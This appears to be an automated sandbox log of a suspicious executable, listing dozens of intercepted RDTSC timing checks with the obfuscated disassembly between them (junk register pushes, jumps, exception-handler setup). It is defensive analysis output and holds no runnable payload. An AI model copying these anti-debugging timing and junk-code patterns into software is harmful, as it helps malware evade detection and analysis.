Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7BE35 second address: C7BEA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 push ecx 0x00000009 mov dword ptr [ebp+122D1CF8h], esi 0x0000000f pop ebx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 push ecx 0x00000018 pop ebx 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 mov dword ptr [ebp+122D2B20h], esi 0x00000026 mov eax, dword ptr [ebp+122D0D2Dh] 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F68950EC3B8h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 00000019h 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 push esi 0x00000047 sub dword ptr [ebp+122D274Bh], ebx 0x0000004d pop edi 0x0000004e push FFFFFFFFh 0x00000050 mov ebx, dword ptr [ebp+122D36F1h] 0x00000056 push eax 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F68950EC3C0h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7EE1C second address: C7EE22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7DEA5 second address: C7DEAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F68950EC3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7DEAF second address: C7DF1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, dx 0x0000000e sub dword ptr [ebp+1245E72Fh], ebx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b or bh, 00000000h 0x0000001e mov dword ptr fs:[00000000h], esp 0x00000025 push 00000000h 0x00000027 push edx 0x00000028 call 00007F68950E7988h 0x0000002d pop edx 0x0000002e mov dword ptr [esp+04h], edx 0x00000032 add dword ptr [esp+04h], 00000017h 0x0000003a inc edx 0x0000003b push edx 0x0000003c ret 0x0000003d pop edx 0x0000003e ret 0x0000003f mov ebx, dword ptr [ebp+122D356Dh] 0x00000045 mov eax, dword ptr [ebp+122D15F9h] 0x0000004b mov bl, 61h 0x0000004d push FFFFFFFFh 0x0000004f and ebx, dword ptr [ebp+122D3755h] 0x00000055 push eax 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F68950E7991h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C7DF1F second address: C7DF30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C856B9 second address: C856DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950E798Fh 0x00000009 jnc 00007F68950E7986h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edi 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C85841 second address: C85847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C85847 second address: C85858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jno 00007F68950E798Ch 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C85858 second address: C8585D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C897D2 second address: C897D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C897D6 second address: C897E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C898B6 second address: C898C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F68950E7986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8F9D6 second address: C8FA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007F68950EC3C2h 0x0000000e jmp 00007F68950EC3C7h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 pop eax 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F68950EC3C8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FB79 second address: C8FB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FCA8 second address: C8FCB3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jc 00007F68950EC3B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FE38 second address: C8FE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FF94 second address: C8FF98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FF98 second address: C8FF9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FF9E second address: C8FFB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BCh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FFB0 second address: C8FFCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7993h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C8FFCB second address: C8FFCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C90159 second address: C9015D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C902A0 second address: C902BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F68950EC3C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C902BE second address: C902CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jo 00007F68950E7986h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C90590 second address: C90594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C90594 second address: C9059C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C975C6 second address: C975D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F68950EC3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C975D0 second address: C975D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C975D6 second address: C975EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C975EE second address: C975F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C97C47 second address: C97C51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F68950EC3B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C97C51 second address: C97C6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F68950E7992h 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C980CE second address: C980D4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C98204 second address: C98214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jp 00007F68950E7986h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C98214 second address: C9821A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9821A second address: C98228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F68950E7986h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C98228 second address: C98252 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F68950EC3B6h 0x00000008 jmp 00007F68950EC3C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 je 00007F68950EC3B6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9CD18 second address: C9CD38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F68950E7988h 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jbe 00007F68950E7986h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9CD38 second address: C9CD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F68950EC3C6h 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9D44D second address: C9D459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F68950E7986h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9D459 second address: C9D463 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F68950EC3B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9D57E second address: C9D599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F68950E7990h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9D88C second address: C9D892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9DF5A second address: C9DF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F68950E7998h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C9C8BD second address: C9C8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jne 00007F68950EC3BEh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jng 00007F68950EC3B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 ja 00007F68950EC3B6h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C2AECA second address: C2AEE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E798Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F68950E7986h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6B865 second address: C6B86F instructions: 0x00000000 rdtsc 0x00000002 jng 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6B86F second address: C6B874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6B998 second address: C6B99C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6B99C second address: C6BA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], ebx 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007F68950E7988h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 ja 00007F68950E798Eh 0x0000002a push dword ptr fs:[00000000h] 0x00000031 jmp 00007F68950E7997h 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d sub dword ptr [ebp+122D285Dh], edx 0x00000043 mov edi, dword ptr [ebp+122D3169h] 0x00000049 mov dword ptr [ebp+1248D656h], esp 0x0000004f mov cx, ax 0x00000052 cmp dword ptr [ebp+122D376Dh], 00000000h 0x00000059 jne 00007F68950E79F9h 0x0000005f and edi, dword ptr [ebp+122D264Ch] 0x00000065 mov byte ptr [ebp+122D2F81h], 00000047h 0x0000006c mov eax, D49AA7D2h 0x00000071 mov dx, FD8Ah 0x00000075 mov dx, C880h 0x00000079 push eax 0x0000007a push eax 0x0000007b push edx 0x0000007c jmp 00007F68950E7997h 0x00000081 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6BF1A second address: C6BF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C0ED second address: C6C106 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950E7995h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C106 second address: C6C10C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C10C second address: C6C11E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C11E second address: C6C133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C837 second address: C6C84A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E798Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6C84A second address: C6C869 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F68950EC3B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+124571ECh] 0x00000013 mov dh, 44h 0x00000015 push 0000001Eh 0x00000017 xor ch, FFFFFFAAh 0x0000001a push eax 0x0000001b push ebx 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6CAE8 second address: C6CAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C6CAEC second address: C6CB42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F68950EC3BEh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push ebx 0x00000016 jmp 00007F68950EC3BFh 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 jnl 00007F68950EC3B6h 0x00000029 jmp 00007F68950EC3C3h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5B7D second address: CA5B89 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5E55 second address: CA5E8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b jmp 00007F68950EC3C8h 0x00000010 jmp 00007F68950EC3C1h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5E8D second address: CA5E93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5E93 second address: CA5EA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F68950EC3BAh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5FF4 second address: CA5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA5FFA second address: CA6002 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA6194 second address: CA619C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA619C second address: CA61AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F68950EC3BDh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA61AE second address: CA61B3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAA58A second address: CAA59F instructions: 0x00000000 rdtsc 0x00000002 jne 00007F68950EC3B6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007F68950EC3BEh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C209C8 second address: C209F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F68950E7986h 0x0000000c popad 0x0000000d jmp 00007F68950E7997h 0x00000012 push ebx 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop esi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C209F9 second address: C209FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C209FF second address: C20A14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jno 00007F68950E7986h 0x00000009 pop edi 0x0000000a pushad 0x0000000b jnl 00007F68950E7986h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CA9FD7 second address: CA9FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push esi 0x00000007 jmp 00007F68950EC3C8h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAA2C9 second address: CAA2CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAA2CF second address: CAA2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F68950EC3C4h 0x0000000b push edx 0x0000000c jmp 00007F68950EC3BEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CACA19 second address: CACA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CACA1F second address: CACA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAC695 second address: CAC699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAC699 second address: CAC6B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CAC6B0 second address: CAC6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F68950E798Dh 0x00000009 jl 00007F68950E7986h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB2DF2 second address: CB2DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB2DF8 second address: CB2DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB2DFC second address: CB2E02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB2E02 second address: CB2E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F68950E7986h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB2E12 second address: CB2E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C25B24 second address: C25B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C25B2A second address: C25B2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: C25B2F second address: C25B3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F68950E7986h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe - RDTSC instruction interceptor: First address: CB1B0E second address: CB1B36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F68950EC3BBh 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F68950EC3BDh 0x00000012 jl 00007F68950EC3B6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
